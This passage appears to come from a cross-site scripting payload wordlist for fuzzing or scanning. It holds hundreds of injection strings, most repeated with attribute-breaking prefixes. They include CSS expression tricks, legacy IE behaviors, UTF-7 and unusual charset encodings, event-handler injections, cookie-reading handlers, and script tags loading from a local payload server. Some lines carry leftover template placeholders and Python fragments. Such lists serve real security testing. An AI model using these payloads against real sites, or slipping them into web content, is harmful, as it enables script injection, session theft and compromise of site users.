  3327. '><object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
  3328. <a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X
  3329. "><a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X
  3330. '><a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X
  3331. <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>
  3332. "><style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>
  3333. '><style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>
  3334. <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
  3335. "><link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
  3336. '><link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
  3337. <style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>
  3338. "><style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>
  3339. '><style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>
  3340. <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">X</a></a><a href="javascript:javascript:alert(1)">X</a><style>*[{}@import'%(css)s?]</style>X
  3341. "><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">X</a></a><a href="javascript:javascript:alert(1)">X</a><style>*[{}@import'%(css)s?]</style>X
  3342. '><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">X</a></a><a href="javascript:javascript:alert(1)">X</a><style>*[{}@import'%(css)s?]</style>X
  3343. <div style="font-family:'foo&#10;;color:red;';">X
  3344. "><div style="font-family:'foo&#10;;color:red;';">X
  3345. '><div style="font-family:'foo&#10;;color:red;';">X
  3346. <div style="font-family:foo}color=red;">X
  3347. "><div style="font-family:foo}color=red;">X
  3348. '><div style="font-family:foo}color=red;">X
  3349. <// style=x:expression\28javascript:alert(1)\29>
  3350. "><// style=x:expression\28javascript:alert(1)\29>
  3351. '><// style=x:expression\28javascript:alert(1)\29>
  3352. <style>*{x:expression(javascript:alert(1))}</style>
  3353. "><style>*{x:expression(javascript:alert(1))}</style>
  3354. '><style>*{x:expression(javascript:alert(1))}</style>
  3355. <div style=content:url(%(svg)s)></div>
  3356. "><div style=content:url(%(svg)s)></div>
  3357. '><div style=content:url(%(svg)s)></div>
  3358. <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X
  3359. "><div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X
  3360. '><div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X
  3361. <div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
  3362. "><div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
  3363. '><div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
  3364. <div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X
  3365. "><div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X
  3366. '><div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X
  3367. <div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
  3368. "><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
  3369. '><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
  3370. <div id="x">X</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
  3371. "><div id="x">X</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
  3372. '><div id="x">X</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
  3373. <x style="background:url('x&#1;;color:red;/*')">X</x>
  3374. "><x style="background:url('x&#1;;color:red;/*')">X</x>
  3375. '><x style="background:url('x&#1;;color:red;/*')">X</x>
  3376. <script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
  3377. "><script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
  3378. '><script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
  3379. <script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
  3380. "><script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
  3381. '><script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
  3382. <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>
  3383. "><script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>
  3384. '><script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>
  3385. <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>
  3386. "><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>
  3387. '><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>
  3388. <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
  3389. "><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
  3390. '><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
  3391. <meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
  3392. "><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
  3393. '><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
  3394. <meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
  3395. "><meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
  3396. '><meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
  3397. X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
  3398. 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`>
  3399. 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;>
  3400. <vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#X></vmlframe>
  3401. "><vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#X></vmlframe>
  3402. '><vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#X></vmlframe>
  3403. 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
  3404. <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">X</a>
  3405. "><a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">X</a>
  3406. '><a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">X</a>
  3407. <x style="behavior:url(%(sct)s)">
  3408. "><x style="behavior:url(%(sct)s)">
  3409. '><x style="behavior:url(%(sct)s)">
  3410. <xml id="X" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#X" datafld="payload"></label>
  3411. "><xml id="X" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#X" datafld="payload"></label>
  3412. '><xml id="X" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#X" datafld="payload"></label>
  3413. <event-source src="%(event)s" onload="javascript:alert(1)">
  3414. "><event-source src="%(event)s" onload="javascript:alert(1)">
  3415. '><event-source src="%(event)s" onload="javascript:alert(1)">
  3416. <a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:X%0A%0A">
  3417. "><a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:X%0A%0A">
  3418. '><a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:X%0A%0A">
  3419. <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;">
  3420. "><div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;">
  3421. '><div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;">
  3422. <script>%(payload)s</script>
  3423. "><script>%(payload)s</script>
  3424. '><script>%(payload)s</script>
  3425. <script src=%(jscript)s></script>
  3426. "><script src=%(jscript)s></script>
  3427. '><script src=%(jscript)s></script>
  3428. <script language='javascript' src='%(jscript)s'></script>
  3429. "><script language='javascript' src='%(jscript)s'></script>
  3430. '><script language='javascript' src='%(jscript)s'></script>
  3431. <script>javascript:alert(1)</script>
  3432. "><script>javascript:alert(1)</script>
  3433. '><script>javascript:alert(1)</script>
  3434. <IMG SRC="javascript:javascript:alert(1);">
  3435. "><IMG SRC="javascript:javascript:alert(1);">
  3436. '><IMG SRC="javascript:javascript:alert(1);">
  3437. <IMG SRC=javascript:javascript:alert(1)>
  3438. "><IMG SRC=javascript:javascript:alert(1)>
  3439. '><IMG SRC=javascript:javascript:alert(1)>
  3440. <IMG SRC=`javascript:javascript:alert(1)`>
  3441. "><IMG SRC=`javascript:javascript:alert(1)`>
  3442. '><IMG SRC=`javascript:javascript:alert(1)`>
  3443. <SCRIPT SRC=%(jscript)s?<B>
  3444. "><SCRIPT SRC=%(jscript)s?<B>
  3445. '><SCRIPT SRC=%(jscript)s?<B>
  3446. <FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
  3447. "><FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
  3448. '><FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
  3449. <BODY ONLOAD=javascript:alert(1)>
  3450. "><BODY ONLOAD=javascript:alert(1)>
  3451. '><BODY ONLOAD=javascript:alert(1)>
  3452. <BODY ONLOAD=javascript:javascript:alert(1)>
  3453. "><BODY ONLOAD=javascript:javascript:alert(1)>
  3454. '><BODY ONLOAD=javascript:javascript:alert(1)>
  3455. <IMG SRC="jav ascript:javascript:alert(1);">
  3456. "><IMG SRC="jav ascript:javascript:alert(1);">
  3457. '><IMG SRC="jav ascript:javascript:alert(1);">
  3458. <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
  3459. "><BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
  3460. '><BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
  3461. <SCRIPT/SRC="%(jscript)s"></SCRIPT>
  3462. "><SCRIPT/SRC="%(jscript)s"></SCRIPT>
  3463. '><SCRIPT/SRC="%(jscript)s"></SCRIPT>
  3464. <<SCRIPT>%(payload)s//<</SCRIPT>
  3465. "><<SCRIPT>%(payload)s//<</SCRIPT>
  3466. '><<SCRIPT>%(payload)s//<</SCRIPT>
  3467. <IMG SRC="javascript:javascript:alert(1)"
  3468. "><IMG SRC="javascript:javascript:alert(1)"
  3469. '><IMG SRC="javascript:javascript:alert(1)"
  3470. <iframe src=%(scriptlet)s <
  3471. "><iframe src=%(scriptlet)s <
  3472. '><iframe src=%(scriptlet)s <
  3473. <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">
  3474. "><INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">
  3475. '><INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">
  3476. <IMG DYNSRC="javascript:javascript:alert(1)">
  3477. "><IMG DYNSRC="javascript:javascript:alert(1)">
  3478. '><IMG DYNSRC="javascript:javascript:alert(1)">
  3479. <IMG LOWSRC="javascript:javascript:alert(1)">
  3480. "><IMG LOWSRC="javascript:javascript:alert(1)">
  3481. '><IMG LOWSRC="javascript:javascript:alert(1)">
  3482. <BGSOUND SRC="javascript:javascript:alert(1);">
  3483. "><BGSOUND SRC="javascript:javascript:alert(1);">
  3484. '><BGSOUND SRC="javascript:javascript:alert(1);">
  3485. <BR SIZE="&{javascript:alert(1)}">
  3486. "><BR SIZE="&{javascript:alert(1)}">
  3487. '><BR SIZE="&{javascript:alert(1)}">
  3488. <LAYER SRC="%(scriptlet)s"></LAYER>
  3489. "><LAYER SRC="%(scriptlet)s"></LAYER>
  3490. '><LAYER SRC="%(scriptlet)s"></LAYER>
  3491. <LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">
  3492. "><LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">
  3493. '><LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">
  3494. <STYLE>@import'%(css)s';</STYLE>
  3495. "><STYLE>@import'%(css)s';</STYLE>
  3496. '><STYLE>@import'%(css)s';</STYLE>
  3497. <META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">
  3498. "><META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">
  3499. '><META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">
  3500. <X STYLE="behavior: url(%(htc)s);">
  3501. "><X STYLE="behavior: url(%(htc)s);">
  3502. '><X STYLE="behavior: url(%(htc)s);">
  3503. <STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>X
  3504. "><STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>X
  3505. '><STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>X
  3506. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">
  3507. "><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">
  3508. '><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">
  3509. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">
  3510. "><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">
  3511. '><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">
  3512. <IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
  3513. "><IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
  3514. '><IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
  3515. <TABLE BACKGROUND="javascript:javascript:alert(1)">
  3516. "><TABLE BACKGROUND="javascript:javascript:alert(1)">
  3517. '><TABLE BACKGROUND="javascript:javascript:alert(1)">
  3518. <TABLE><TD BACKGROUND="javascript:javascript:alert(1)">
  3519. "><TABLE><TD BACKGROUND="javascript:javascript:alert(1)">
  3520. '><TABLE><TD BACKGROUND="javascript:javascript:alert(1)">
  3521. <DIV STYLE="background-image: url(javascript:javascript:alert(1))">
  3522. "><DIV STYLE="background-image: url(javascript:javascript:alert(1))">
  3523. '><DIV STYLE="background-image: url(javascript:javascript:alert(1))">
  3524. <DIV STYLE="width:expression(javascript:alert(1));">
  3525. "><DIV STYLE="width:expression(javascript:alert(1));">
  3526. '><DIV STYLE="width:expression(javascript:alert(1));">
  3527. <IMG STYLE="X:expr/*X*/ession(javascript:alert(1))">
  3528. "><IMG STYLE="X:expr/*X*/ession(javascript:alert(1))">
  3529. '><IMG STYLE="X:expr/*X*/ession(javascript:alert(1))">
  3530. <X STYLE="X:expression(javascript:alert(1))">
  3531. "><X STYLE="X:expression(javascript:alert(1))">
  3532. '><X STYLE="X:expression(javascript:alert(1))">
  3533. <STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>
  3534. "><STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>
  3535. '><STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>
  3536. <STYLE>.X{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=X></A>
  3537. "><STYLE>.X{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=X></A>
  3538. '><STYLE>.X{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=X></A>
  3539. "><A CLASS=X></A>
  3540. '><A CLASS=X></A>
  3541. <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>
  3542. "><STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>
  3543. '><STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>
  3544. <!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->
  3545. "><!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->
  3546. '><!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->
  3547. <BASE HREF="javascript:javascript:alert(1);//">
  3548. "><BASE HREF="javascript:javascript:alert(1);//">
  3549. '><BASE HREF="javascript:javascript:alert(1);//">
  3550. <OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
  3551. "><OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
  3552. '><OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
  3553. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>
  3554. "><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>
  3555. '><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>
  3556. <HTML xmlns:X><?import namespace="X" implementation="%(htc)s"><X:X>X</X:X></HTML>""","XML namespace."),("""<XML ID="X"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
  3557. "><HTML xmlns:X><?import namespace="X" implementation="%(htc)s"><X:X>X</X:X></HTML>""","XML namespace."),("""<XML ID="X"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
  3558. '><HTML xmlns:X><?import namespace="X" implementation="%(htc)s"><X:X>X</X:X></HTML>""","XML namespace."),("""<XML ID="X"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
  3559. "><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
  3560. '><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
  3561. <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
  3562. "><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
  3563. '><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="X&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML>
  3564. <SCRIPT SRC="%(jpg)s"></SCRIPT>
  3565. "><SCRIPT SRC="%(jpg)s"></SCRIPT>
  3566. '><SCRIPT SRC="%(jpg)s"></SCRIPT>
  3567. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
  3568. "><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
  3569. '><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
  3570. <form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X
  3571. "><form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X
  3572. '><form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X
  3573. <body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
  3574. "><body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
  3575. '><body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
  3576. <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)">
  3577. "><P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)">
  3578. '><P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)">
  3579. <STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>
  3580. "><STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>
  3581. '><STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>
  3582. <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
  3583. "><meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
  3584. '><meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
  3585. <SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
  3586. "><SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
  3587. '><SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
  3588. <style onreadystatechange=javascript:javascript:alert(1);></style>
  3589. "><style onreadystatechange=javascript:javascript:alert(1);></style>
  3590. '><style onreadystatechange=javascript:javascript:alert(1);></style>
  3591. <?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
  3592. "><?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
  3593. '><?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
  3594. <embed code=%(scriptlet)s></embed>
  3595. "><embed code=%(scriptlet)s></embed>
  3596. '><embed code=%(scriptlet)s></embed>
  3597. <embed code=javascript:javascript:alert(1);></embed>
  3598. "><embed code=javascript:javascript:alert(1);></embed>
  3599. '><embed code=javascript:javascript:alert(1);></embed>
  3600. <embed src=%(jscript)s></embed>
  3601. "><embed src=%(jscript)s></embed>
  3602. '><embed src=%(jscript)s></embed>
  3603. <frameset onload=javascript:javascript:alert(1)></frameset>
  3604. "><frameset onload=javascript:javascript:alert(1)></frameset>
  3605. '><frameset onload=javascript:javascript:alert(1)></frameset>
  3606. <object onerror=javascript:javascript:alert(1)>
  3607. "><object onerror=javascript:javascript:alert(1)>
  3608. '><object onerror=javascript:javascript:alert(1)>
  3609. <embed type="image" src=%(scriptlet)s></embed>
  3610. "><embed type="image" src=%(scriptlet)s></embed>
  3611. '><embed type="image" src=%(scriptlet)s></embed>
  3612. <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
  3613. "><XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
  3614. '><XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
  3615. <IMG SRC=&{javascript:alert(1);};>
  3616. "><IMG SRC=&{javascript:alert(1);};>
  3617. '><IMG SRC=&{javascript:alert(1);};>
  3618. <a href="jav&#65ascript:javascript:alert(1)">test1</a>
  3619. "><a href="jav&#65ascript:javascript:alert(1)">test1</a>
  3620. '><a href="jav&#65ascript:javascript:alert(1)">test1</a>
  3621. <a href="jav&#97ascript:javascript:alert(1)">test1</a>
  3622. "><a href="jav&#97ascript:javascript:alert(1)">test1</a>
  3623. '><a href="jav&#97ascript:javascript:alert(1)">test1</a>
  3624. <embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>
  3625. "><script>%(payload)s</script>
  3626. '><script>%(payload)s</script>"></embed>
  3627. <iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>">
  3628. "><iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>">
  3629. '><iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>">
  3630. alert(String.fromCharCode(75,67,70))//";alert(String.fromCharCode(75,67,70))//--
  3631. ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  3632. <SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js></SCRIPT>
  3633. "><SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js></SCRIPT>
  3634. '><SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js></SCRIPT>
  3635. <SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></SCRIPT>
  3636. "><SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></SCRIPT>
  3637. '><SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></SCRIPT>
  3638. <IMG SRC="javascript:alert('X');">
  3639. "><IMG SRC="javascript:alert('X');">
  3640. '><IMG SRC="javascript:alert('X');">
  3641. <IMG SRC=javascript:alert('X')>
  3642. "><IMG SRC=javascript:alert('X')>
  3643. '><IMG SRC=javascript:alert('X')>
  3644. <IMG SRC=JaVaScRiPt:alert('X')>
  3645. "><IMG SRC=JaVaScRiPt:alert('X')>
  3646. '><IMG SRC=JaVaScRiPt:alert('X')>
  3647. <IMG SRC=javascript:alert("X")>
  3648. "><IMG SRC=javascript:alert("X")>
  3649. '><IMG SRC=javascript:alert("X")>
  3650. <IMG SRC=`javascript:alert("X says, 'X'")`>
  3651. "><IMG SRC=`javascript:alert("X says, 'X'")`>
  3652. '><IMG SRC=`javascript:alert("X says, 'X'")`>
  3653. <a onmouseover="alert(document.cookie)">X link</a>
  3654. "><a onmouseover="alert(document.cookie)">X link</a>
  3655. '><a onmouseover="alert(document.cookie)">X link</a>
  3656. <a onmouseover=alert(document.cookie)>X link</a>
  3657. "><a onmouseover=alert(document.cookie)>X link</a>
  3658. '><a onmouseover=alert(document.cookie)>X link</a>
  3659. <IMG """><SCRIPT>alert("X")</SCRIPT>">
  3660. "><IMG """><SCRIPT>alert("X")</SCRIPT>">
  3661. '><IMG """><SCRIPT>alert("X")</SCRIPT>">
  3662. <IMG SRC= onmouseover="alert('X')">
  3663. "><IMG SRC= onmouseover="alert('X')">
  3664. '><IMG SRC= onmouseover="alert('X')">
  3665. <IMG onmouseover="alert('X')">
  3666. "><IMG onmouseover="alert('X')">
  3667. '><IMG onmouseover="alert('X')">
  3668. <IMG SRC="jav&#x09;ascript:alert('X');">
  3669. "><IMG SRC="jav&#x09;ascript:alert('X');">
  3670. '><IMG SRC="jav&#x09;ascript:alert('X');">
  3671. <IMG SRC="jav&#x0D;ascript:alert('X');">
  3672. "><IMG SRC="jav&#x0D;ascript:alert('X');">
  3673. '><IMG SRC="jav&#x0D;ascript:alert('X');">
  3674. perl -e 'print "<IMG SRC=java\0script:alert(\"X\")>";' > out
  3675. <IMG SRC=" &#14; javascript:alert('X');">
  3676. "><IMG SRC=" &#14; javascript:alert('X');">
  3677. '><IMG SRC=" &#14; javascript:alert('X');">
  3678. <SCRIPT/X SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>
